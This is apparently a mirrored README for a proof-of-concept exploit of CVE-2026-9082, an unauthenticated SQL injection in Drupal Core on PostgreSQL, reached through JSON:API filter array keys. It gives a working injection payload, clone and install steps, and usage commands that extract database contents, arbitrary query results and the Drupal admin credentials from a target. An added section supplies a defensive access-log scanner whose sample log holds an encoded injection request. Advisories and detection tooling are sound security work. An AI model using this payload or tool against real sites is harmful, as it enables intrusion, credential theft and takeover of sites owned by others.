## https://sploitus.com/exploit?id=89259320-7066-518A-B075-CE8CD77E926F
# CVE-2026-9082: Drupal Core PostgreSQL SQL Injection PoC

## Overview

This repository provides an ethical Proof-of-Concept (PoC) for CVE-2026-9082, a Highly Critical SQL injection vulnerability in Drupal Core affecting all PostgreSQL-backed sites running Drupal 8.0 through 11.3.9.


The flaw resides in the PostgreSQL Entity Query Condition handler and can be exploited by anonymous (unauthenticated) users through the JSON:API module, which has been enabled by default since Drupal 9.


Official advisory: SA-CORE-2026-004


## Vulnerability Summary

Drupal Core includes a database abstraction API designed to sanitize queries and prevent SQL injection. A flaw in the PostgreSQL-specific Entity Query Condition class (core/modules/pgsql/src/EntityQuery/Condition.php) allows an attacker to inject arbitrary SQL through user-controlled array keys passed via JSON:API filter parameters.



- CVE ID: CVE-2026-9082
- Advisory: SA-CORE-2026-004
- Affected Software: Drupal Core
- Affected Versions: 8.0.0 – 11.3.9 (PostgreSQL backend only)
- Fixed in: 11.3.10, 11.2.12, 10.6.9, 10.5.10
- Severity: Highly Critical (20/25 on the Drupal risk scale)
- Authentication: None required (anonymous)
- Impact: Data exfiltration, privilege escalation, RCE in some configurations
- Attack vector: HTTP, via JSON:API filter condition array keys


## How it works

1. The `translateCondition()` method in the PostgreSQL Condition class iterates over `$condition['value']` and uses the array keys to construct PDO placeholder names: `$where_id = $where_prefix . $key;`
2. JSON:API allows anonymous users to supply filter values with arbitrary array keys via URL parameters: `filter[x][condition][value][MALICIOUS_KEY]=val`
3. PDO named placeholders consist only of `[a-zA-Z0-9_]` characters. When the key contains `)`, PDO stops parsing the placeholder name; everything after it becomes literal SQL injected into the query.
4. By sending a key like `1))/**/OR/**/(SELECT pg_sleep(5)) IS NOT NULL)--`, the attacker closes the `IN()` clause and appends arbitrary SQL, while the binding for `:prefix_1` is satisfied by a legitimate key `1` in the same request.
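As an added detection aid, not part of this repository or of Drupal, the following Python scans web-server access logs for JSON:API filter value-array keys that fall outside the PDO placeholder character set described above. The log lines are constructed samples, and treating the `[condition]` segment as optional (to also inspect the shorthand filter form) is an assumption.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# JSON:API filter value-array parameter name after URL decoding, e.g.
#   filter[x][condition][value][KEY]=val
# "[condition]" is optional here as an assumption, so the shorthand form is checked too.
VALUE_KEY_RE = re.compile(r"^filter\[[^\]]*\](?:\[condition\])?\[value\]\[(?P<key>.*)\]$")
# A PDO named placeholder consists only of these characters.
PLACEHOLDER_RE = re.compile(r"^[a-zA-Z0-9_]+$")
# Request line of a combined-format access log, e.g. "GET /path?q=1 HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_value_keys(url):
    """Return filter value-array keys in `url` that cannot be a clean PDO placeholder."""
    hits = []
    # parse_qsl percent-decodes the parameter names, so an encoded ')' is caught too.
    for name, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        m = VALUE_KEY_RE.match(name)
        if m and not PLACEHOLDER_RE.match(m.group("key")):
            hits.append(m.group("key"))
    return hits


def scan_access_log(lines):
    """Return (line_number, keys) for each log line carrying a suspicious value key."""
    findings = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        keys = suspicious_value_keys("http://placeholder" + m.group("target"))
        if keys:
            findings.append((number, keys))
    return findings


# Constructed sample log lines (not real traffic): a normal JSON:API IN filter,
# a request whose value-array key carries an encoded ')' and '--', and a plain page hit.
SAMPLE_LOG = [
    '198.51.100.10 - - [01/Jan/2026:10:00:00 +0000] "GET /jsonapi/node/article'
    '?filter[a][condition][operator]=IN&filter[a][condition][value][0]=1'
    '&filter[a][condition][value][1]=2 HTTP/1.1" 200 4096',
    '198.51.100.10 - - [01/Jan/2026:10:00:01 +0000] "GET /jsonapi/node/article'
    '?filter[a][condition][operator]=IN&filter[a][condition][value][1]=1'
    '&filter[a][condition][value][1%29%29--]=1 HTTP/1.1" 200 4096',
    '198.51.100.10 - - [01/Jan/2026:10:00:02 +0000] "GET /node/1 HTTP/1.1" 200 1024',
]
```

Calling `scan_access_log(SAMPLE_LOG)` flags only the second sample line; feed it real log lines (one string per line) to triage traffic against a PostgreSQL-backed site.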


## References & Credit

- Advisory: SA-CORE-2026-004
- Patch commit: ea9524d9
- Discoverer: michaelmaturi (credited in the advisory)


## Legal Notice

This tool is intended for authorized security testing, educational purposes, and ethical research only. Unauthorized access to computer systems is illegal.


## Installation

git clone https://github.com/7h30th3r0n3/CVE-2026-9082-Drupal-PoC.git
cd CVE-2026-9082-Drupal-PoC
pip install requests rich

## Usage (CLI)

# Check if target is vulnerable
python3 CVE-2026-9082.py -u https://target.com --check

# Extract PostgreSQL version
python3 CVE-2026-9082.py -u https://target.com --version

# Extract database info (user + db name)
python3 CVE-2026-9082.py -u https://target.com --dbinfo

# Extract Drupal admin credentials (uid=1)
python3 CVE-2026-9082.py -u https://target.com --admin

# List database tables
python3 CVE-2026-9082.py -u https://target.com --tables

# Custom SQL query extraction
python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"

# Use boolean-based extraction (faster but less reliable)
python3 CVE-2026-9082.py -u https://target.com --version -m bool

# Interactive mode (no arguments)
python3 CVE-2026-9082.py


## Author

- PoC developed by 7h30th3r0n3
- Vulnerability discovered by michaelmaturi